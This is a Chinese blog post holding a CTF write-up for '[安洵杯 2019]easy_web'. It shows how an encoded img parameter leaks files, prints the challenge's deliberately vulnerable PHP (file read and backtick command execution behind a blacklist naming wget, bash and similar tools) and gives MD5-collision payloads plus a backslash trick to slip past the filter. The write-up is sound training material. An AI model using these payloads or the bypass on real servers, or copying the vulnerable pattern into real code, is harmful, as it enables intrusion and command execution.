<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="Hexo Theme Keep">
    <meta name="author" content="n3ym4r">
    
    <title>
        
        n3ym4r&#39;s blog
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="/images/logo.svg">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"example.com","root":"/","language":"zh-CN","path":"search.json"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":false,"init_open":true},"style":{"primary_color":"#5ed5cc","logo":"/images/logo.svg","favicon":"/images/logo.svg","avatar":"/images/logo.svg","font_size":null,"font_family":null,"left_side_width":"260px","content_max_width":"920px","hover":{"shadow":true,"scale":true},"first_screen":{"enable":true,"header_transparent":false,"background_img":"/images/bg.svg","description":"Pay attention to safety!","font_color":null,"hitokoto":{"enable":true}},"scroll":{"progress_bar":{"enable":false},"percent":{"enable":true}}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block_tools":{"enable":true,"style":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":false},"version":"3.4.9"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/images/logo.svg">
                </a>
            
            <a class="logo-title" href="/">
               n3ym4r&#39;s blog
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/links"
                            >
                                友链
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/links">友链</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="article-content-container">

        <div class="article-title">
            <span class="title-hover-animation"></span>
        </div>

        
            <div class="article-header">
                <div class="avatar">
                    <img src="/images/logo.svg">
                </div>
                <div class="info">
                    <div class="author">
                        <span class="name">n3ym4r</span>
                        
                    </div>
                    <div class="meta-info">
                        
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-01-16 13:21:24</span>
        <span class="mobile">2023-01-16 13:21</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-01-16 13:24:47</span>
    </span>
    
    
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>803 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>4 分钟</span>
        </span>
    
    
</div>

                    </div>
                </div>
            </div>
        

        <div class="article-content markdown-body">
            <pre><code>title: [安洵杯 2019]easy_web
date: 2023-01-16 13:22:14
tags: [Web安全] 
categories: [打靶]
sticky: 0
</code></pre>
<p>打开页面<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673841793093-8f0da070-0efa-46ce-9f5f-5e51e448622f.png#averageHue=%23080808&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=536&id=udae53fa3&margin=%5Bobject%20Object%5D&name=image.png&originHeight=837&originWidth=1834&originalType=binary&ratio=1&rotation=0&showTitle=false&size=282733&status=done&style=none&taskId=uf5b4d1ba-89b4-460b-b0ae-f13c8af2a02&title=&width=1173.76" alt="image.png"><br>我们可以看到传了两个参数img和cmd，img值拿去尝试解密,经过两次base64解码得到一串16进制码<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842224161-3b05f1ae-9d72-4972-b04c-bba475d623ea.png#averageHue=%23fdfdfd&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=170&id=u6673073a&margin=%5Bobject%20Object%5D&name=image.png&originHeight=266&originWidth=1285&originalType=binary&ratio=1&rotation=0&showTitle=false&size=34253&status=done&style=none&taskId=u8e861136-ef21-4538-9946-2847c54f4be&title=&width=822.4" alt="image.png"><br>再进行ascillhex解码<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842297164-2a57860b-e861-460b-a832-aaaf5e3507fa.png#averageHue=%23212427&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=162&id=ucdba6c87&margin=%5Bobject%20Object%5D&name=image.png&originHeight=253&originWidth=357&originalType=binary&ratio=1&rotation=0&showTitle=false&size=6086&status=done&style=none&taskId=uae5a2a55-d62e-455f-9227-f4272bbcecc&title=&width=228.48" alt="image.png"><br>得到文件名555.php<br>这时候，我们就能知道后端会将文件名经过base64编码后发到前端进行处理，那么我们可以逆过程，推出其他文件的编码名，在前端回显。<br>读index.php<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842545098-d6b87167-baa5-446d-9101-bb7e5d914d17.png#averageHue=%23222528&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=156&id=ubbaac89c&margin=%5Bobject%20Object%5D&name=image.png&originHeight=243&originWidth=253&originalType=binary&ratio=1&rotation=0&showTitle=false&size=6456&status=done&style=none&taskId=u2e83dae0-9226-4cf4-a4be-045ee8e461f&title=&width=161.92" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842672622-f057164b-5891-4593-92dd-0d440198884c.png#averageHue=%23fdfdfc&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=107&id=ub22ec121&margin=%5Bobject%20Object%5D&name=image.png&originHeight=167&originWidth=1374&originalType=binary&ratio=1&rotation=0&showTitle=false&size=27741&status=done&style=none&taskId=u9166c998-9238-49aa-846f-3dd3aebca96&title=&width=879.36" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842689366-1e5272d6-2602-417c-ad9b-f8cb8dd688f1.png#averageHue=%23fdfcfc&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=106&id=ue35f6d39&margin=%5Bobject%20Object%5D&name=image.png&originHeight=166&originWidth=1354&originalType=binary&ratio=1&rotation=0&showTitle=false&size=28739&status=done&style=none&taskId=u6ad1ade0-3570-4bb4-97a8-a43876f06c5&title=&width=866.56" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842794965-8fd3e22c-14f1-4f81-9699-7c02971b98d0.png#averageHue=%23282626&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=435&id=ude6cfc09&margin=%5Bobject%20Object%5D&name=image.png&originHeight=679&originWidth=1553&originalType=binary&ratio=1&rotation=0&showTitle=false&size=188664&status=done&style=none&taskId=ud1acd0ec-f6bc-488d-a33d-41e98044c51&title=&width=993.92" alt="image.png"><br>回显编码之后的index.php<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673842932871-3f3a3fde-d917-4861-a380-1f46a418b6ae.png#averageHue=%23f7f4f2&clientId=u111a1b03-09ba-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=460&id=u1f3e273e&margin=%5Bobject%20Object%5D&name=image.png&originHeight=719&originWidth=1568&originalType=binary&ratio=1&rotation=0&showTitle=false&size=360384&status=done&style=none&taskId=ua5f19aac-803a-484e-b5a5-e51d4e4678b&title=&width=1003.52" alt="image.png"><br>解码得到index源码<br>进行代码审计</p>
<pre><code class="go">&lt;?php
error_reporting(E_ALL || ~ E_NOTICE);
header(&#39;content-type:text/html;charset=utf-8&#39;);
$cmd = $_GET[&#39;cmd&#39;];
if (!isset($_GET[&#39;img&#39;]) || !isset($_GET[&#39;cmd&#39;])) 
    header(&#39;Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=&#39;);
//解码得出真实文件名
$file = hex2bin(base64_decode(base64_decode($_GET[&#39;img&#39;])));
//将文件名中的一些特殊符号替换为空
$file = preg_replace(&quot;/[^a-zA-Z0-9.]+/&quot;, &quot;&quot;, $file);
//不能直接读flag文件
if (preg_match(&quot;/flag/i&quot;, $file)) &#123;
    echo &#39;&lt;img src =&quot;./ctf3.jpeg&quot;&gt;&#39;;
    die(&quot;xixiï½ no flag&quot;);
&#125; else &#123;
    //将文件base64编码后传到前端
    $txt = base64_encode(file_get_contents($file));
    echo &quot;&lt;img src=&#39;data:image/gif;base64,&quot; . $txt . &quot;&#39;&gt;&lt;/img&gt;&quot;;
    echo &quot;&lt;br&gt;&quot;;
&#125;
echo $cmd;
echo &quot;&lt;br&gt;&quot;;
//禁用的函数或特殊符号列表
if (preg_match(&quot;/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\&#39;|\&quot;|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\&#123;|\&#125;|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|&#123;|&#125;|\(|\)|-|&lt;|&gt;/i&quot;, $cmd)) &#123;
    echo(&quot;forbid ~&quot;);
    echo &quot;&lt;br&gt;&quot;;
&#125; else &#123;
    //md5强碰撞
    if ((string)$_POST[&#39;a&#39;] !== (string)$_POST[&#39;b&#39;] &amp;&amp; md5($_POST[&#39;a&#39;]) === md5($_POST[&#39;b&#39;])) &#123;
        //反引号，可以执行该命令
        echo `$cmd`;
    &#125; else &#123;
        echo (&quot;md5 is funny ~&quot;);
    &#125;
&#125;

?&gt;
&lt;html&gt;
&lt;style&gt;
  body&#123;
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:#CCCCCC;
&#125;
&lt;/style&gt;
&lt;body&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>可以知道，主要就是看两个post传参a和b,和cmd参数<br>这里cmd过滤了几乎所有的查看文件的命令，事实上是可以绕过的。<br>用反斜杠绕过<br>在Linux中，反引号对一些命令也几乎没有影响，测试如下：<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673844786545-54af4bc3-e382-4e9f-a503-9732c68f0302.png#averageHue=%23242b37&clientId=ua2ee4f5c-8c9d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=192&id=u2588a758&margin=%5Bobject%20Object%5D&name=image.png&originHeight=300&originWidth=912&originalType=binary&ratio=1&rotation=0&showTitle=false&size=121882&status=done&style=none&taskId=u1a642067-ba12-430c-a621-dc51f341070&title=&width=583.68" alt="image.png"><br>然后就是后面的MD5强碰撞<br>这里有两个版本</p>
<pre><code class="go">a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&amp;b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&amp;b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</code></pre>
<p>然后直接传参<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673845996659-270b9a2b-0d50-48ae-a34f-eb14de599f5f.png#averageHue=%23312e2e&clientId=ua2ee4f5c-8c9d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=319&id=uf259bd3e&margin=%5Bobject%20Object%5D&name=image.png&originHeight=498&originWidth=1192&originalType=binary&ratio=1&rotation=0&showTitle=false&size=95755&status=done&style=none&taskId=u398e4d14-bc23-4f87-8e37-5772127661f&title=&width=762.88" alt="image.png"><br><img src="https://cdn.nlark.com/yuque/0/2023/png/32497516/1673846055534-aa3b6aa6-efa2-4ccc-8e93-fb37a8fe4aa5.png#averageHue=%23302f2e&clientId=ua2ee4f5c-8c9d-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=278&id=u860cbab8&margin=%5Bobject%20Object%5D&name=image.png&originHeight=435&originWidth=1181&originalType=binary&ratio=1&rotation=0&showTitle=false&size=91923&status=done&style=none&taskId=u037e4d6b-ca32-4662-a126-304de550fbf&title=&width=755.84" alt="image.png"><br>得到flag</p>

        </div>

        
            <div class="post-copyright-info">
                <div class="article-copyright-info-container">
    <ul class="copyright-info-content">
        <li>本文标题：</li>
        <li>本文作者：n3ym4r</li>
        <li>创建时间：2023-01-16 13:21:24</li>
        <li>
            本文链接：https://n3ym4r.github.io/2023/01/16/[安洵杯 2019]easy_web/
        </li>
        <li>
            版权声明：本博客所有文章除特别声明外，均采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">BY-NC-SA</a> 许可协议。转载请注明出处！
        </li>
    </ul>
</div>

            </div>
        

        

        
            <div class="article-nav">
                
                
                    <div class="article-next">
                        <a class="next"
                           rel="next"
                           href="/2022/10/15/hello-world/"
                        >
                            <span class="title flex-center">
                                <span class="post-nav-title-item">Hello World</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex-center">
                              <i class="fas fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        

        
    </div>
</div>


                
            </div>

        </div>

        <div class="page-main-content-bottom">
            
<footer class="footer">
    <div class="info-container">
        <div class="copyright-info info-item">
            &copy;
            
                <span>2020</span> -
            
            2023
            
                &nbsp;<i class="fas fa-heart icon-animate"></i>
                &nbsp;<a href="/">n3ym4r</a>
            
        </div>
        
        <div class="theme-info info-item">
            由 <a target="_blank" href="https://hexo.io">Hexo</a> 驱动&nbsp;|&nbsp;主题
            &nbsp;
            <a class="theme-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep v3.4.9</a>
        </div>
        
        
    </div>
</footer>

        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="tools-list">
        <!-- TOC aside toggle -->
        
            <li class="tools-item page-aside-toggle">
                <i class="fas fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-bottom-side-tools">
        <div class="side-tools-container">
    <ul class="side-tools-list">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <li class="tools-item tool-expand-width flex-center">
            <i class="fas fa-up-right-and-down-left-from-center"></i>
        </li>

        <li class="tools-item tool-dark-light-toggle flex-center">
            <i class="fas fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list">
        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>
        
            <li class="tools-item tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    
        <aside class="page-aside">
            <div class="post-toc-wrap">
    <div class="post-toc">
        
    </div>
</div>
        </aside>
    

    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/code-block-tools.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/left-side-toggle.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/anime.min.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/toc.js"></script>
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.4.9/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>



</body>
</html>
